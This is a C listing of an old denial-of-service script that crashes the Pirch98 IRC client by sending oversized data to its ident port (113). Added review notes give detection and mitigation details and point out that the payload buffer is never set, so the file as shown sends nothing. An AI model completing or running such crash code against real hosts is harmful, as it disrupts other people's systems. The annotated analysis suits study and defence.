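/* code by eth0 from buffer0verfl0w security */
/* http://www.b0f.com */
/*
 * *NOTE* code was not tested, this was only coded with the information
 * given by Chopsui-cide/MmM '00, use at your own risk *NOTE*
 *
 * Pirch98 ident/fserve daemon DoS attack
 * Feb, 20 2000 - 00:05
 * contributed by: Chopsui-cide
 *
 * Pirch98 irc client can be trivially crashed by a simple overflow if
 * either the fserve, or ident daemons are active.
 */

/*
 * Review notes
 *
 * - Affected surface, per the advisory text above: the ident and fserve
 *   listeners built into the Pirch98 client. The service is reachable only
 *   while one of those daemons is enabled, so switching both off removes it.
 * - dport (113) is the ident port. A legitimate ident query is one short
 *   line holding a port pair, so a client writing LEN (512) bytes to TCP/113
 *   stands out in connection or packet logs.
 * - The payload pointer `str` is declared but never assigned anywhere in
 *   this listing, so the original passed a null pointer to send(). This is
 *   consistent with the author's "not tested" note: the file as published is
 *   not a usable check for whether a given client is affected.
 * - The header names of the original #include directives were lost when the
 *   page was extracted (seven bare directives remained). The set below is
 *   inferred from the functions the code calls.
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>

#define dport 113
#define LEN 512

int x, s;
char *str; /* varying the size would give diff results */
/* addr, spoofedaddr, host and x are declared but unused in this listing. */
struct sockaddr_in addr, spoofedaddr;
struct hostent *host;

/*
 * Resolve `server` and connect the already-created TCP socket `sock` to it.
 *
 * sock    socket descriptor obtained from socket()
 * server  host name or dotted-quad IPv4 address
 * port    destination TCP port, host byte order
 *
 * Returns 0 on success, -3 if the name cannot be resolved, -4 if connect()
 * fails. On connect() failure the socket is closed before returning; on a
 * resolution failure it is left open for the caller.
 */
int open_sock(int sock, char *server, int port)
{
    struct sockaddr_in blah;
    struct hostent *he;

    memset(&blah, 0, sizeof blah);
    blah.sin_family = AF_INET;
    blah.sin_port = htons((unsigned short)port);

    he = gethostbyname(server);
    if (he != NULL && he->h_addrtype == AF_INET &&
        he->h_addr_list[0] != NULL &&
        (size_t)he->h_length == sizeof blah.sin_addr) {
        /* Copy exactly one IPv4 address; never trust h_length as a size. */
        memcpy(&blah.sin_addr, he->h_addr_list[0], sizeof blah.sin_addr);
    } else {
        /*
         * inet_addr() signals failure with INADDR_NONE. The original tested
         * "< 0", which can never be true for an unsigned in_addr_t.
         */
        blah.sin_addr.s_addr = inet_addr(server);
        if (blah.sin_addr.s_addr == INADDR_NONE) {
            /* gethostbyname() reports through h_errno, not errno. */
            fprintf(stderr, "gethostbyname(): cannot resolve %s\n", server);
            return -3;
        }
    }

    /* Pass the real structure size instead of the hard-coded 16. */
    if (connect(sock, (struct sockaddr *)&blah, sizeof blah) == -1) {
        perror("connect()");
        close(sock);
        return -4;
    }

    printf("Connected to [%s:%d].\n", server, port);
    return 0; /* the original used a bare "return;" in an int function */
}

/*
 * Entry point: takes one argument (the target host), connects to TCP port
 * dport and makes three send() calls of LEN bytes from `str`.
 *
 * Returns 0 when all three sends succeed, EXIT_FAILURE otherwise.
 */
int main(int argc, char *argv[])
{
    /* Progress messages reproduced exactly as in the original listing. */
    static const char *const before_msg[] = {
        "Sending crash....\n ",
        "Sending crash....\n",
        "Sending crash.... \n",
    };
    static const char *const after_msg[] = {
        "1st crash sent...\n",
        "2nd crash sent...\n",
        "3rd crash sent...\n",
    };
    size_t i;

    if (argc != 2) {
        /* The argument name was lost from the original usage string. */
        fprintf(stderr, "Usage: %s <host>\n", argv[0]);
        return EXIT_FAILURE;
    }

    /*
     * `str` is never assigned in this file. Refuse to continue rather than
     * hand a null pointer to send(), which is what the original did.
     */
    if (str == NULL) {
        fprintf(stderr, "payload buffer 'str' is not set in this listing; "
                        "nothing to send\n");
        return EXIT_FAILURE;
    }

    if ((s = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)) == -1) {
        perror("socket()");
        return EXIT_FAILURE;
    }

    /* The original ignored this result and wrote to an unconnected socket. */
    if (open_sock(s, argv[1], dport) != 0) {
        return EXIT_FAILURE; /* process exit releases the descriptor */
    }

    for (i = 0; i < sizeof before_msg / sizeof before_msg[0]; i++) {
        fputs(before_msg[i], stdout);
        /* Report a failed send instead of printing "sent" unconditionally. */
        if (send(s, str, LEN, 0) == -1) {
            perror("send()");
            close(s);
            return EXIT_FAILURE;
        }
        fputs(after_msg[i], stdout);
    }

    usleep(100000);
    printf("Done!\n");
    close(s);
    return 0;
}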